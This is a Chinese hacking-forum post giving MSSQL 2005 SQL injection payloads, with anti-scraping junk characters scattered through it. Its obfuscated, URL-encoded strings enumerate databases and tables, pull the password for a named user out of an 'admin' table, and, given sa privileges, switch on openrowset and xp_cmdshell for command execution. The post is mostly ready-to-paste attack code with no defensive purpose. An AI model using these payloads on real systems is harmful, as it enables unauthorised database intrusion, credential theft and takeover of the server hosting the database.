找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2168|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

* ^9 i: f% o& z# Q1 i
) k7 F& l7 j" }* a
8 e4 ?8 T' o' f6 f0 F* u[Copy to clipboard]CODE:# \. S+ J. x  T4 z+ D& E- I
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
2 W* l8 \! A9 O* X( h, l4 _
+ l- t& S" \  o爆表语句,somedb部份是所要列的数据库,红色数字1累加" S; M/ r3 U* F- e* _

+ L9 p6 {8 U1 \% G4 J8 t% k! w+ I/ o6 R2 C& z
[Copy to clipboard]CODE:3 [+ I, }" I3 B9 O5 n, Y3 x4 F
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
2 a! e; t/ V1 v5 i" ?6 r
9 M/ g8 [2 h4 C. p+ I8 Y爆字段语句,爆表admin里user='icerover'的密码段
5 G9 i# R1 ~, X$ A! x; F7 ^8 X2 ?
* q+ T+ N7 F, P) o, P9 d$ q0 s
[Copy to clipboard]CODE:
0 m) y8 M5 C. b  h' d3 z/ w' n**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--: h! t+ Y3 ?* A' o; S& ^
- M2 x' H9 i7 j  ^+ e! p) m) L
mssql2005默认没有开xp_cmdshell的,openrowset也不能用, a9 q/ }) l6 }3 B$ b0 ?$ f
如果是sa权限,可以这样来开启
. @* W3 `' i+ k$ I. F开启openrowset
9 f- J: o) n0 L( }1 R; u/ Q3 D; |+ e# \% |0 h
4 ?- }0 h; Z6 `* ~- f5 K# {
[Copy to clipboard]CODE:- f) J) |" _( m& G: n  R
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
3 f, x. V% d7 k; Y; K- ~/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--1 }) Q5 {: L& M1 S; a

8 W2 A0 e6 @9 }1 M: \: Q开启xp_cmdshell  Y! t7 y! H8 z7 n

/ F) h1 a! [' z1 d) k. n, R/ m8 q9 @: I; d$ R3 m/ t
[Copy to clipboard]CODE:% i( i( n+ r! [9 A, \
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--- u- |7 C8 Y- l/ D& K' U
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
. K/ @; I: \3 I4 n  H( E8 \
4 K9 l) T1 G( |0 s7 Rok,over~~晚安$ O5 a. T2 E8 T) [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表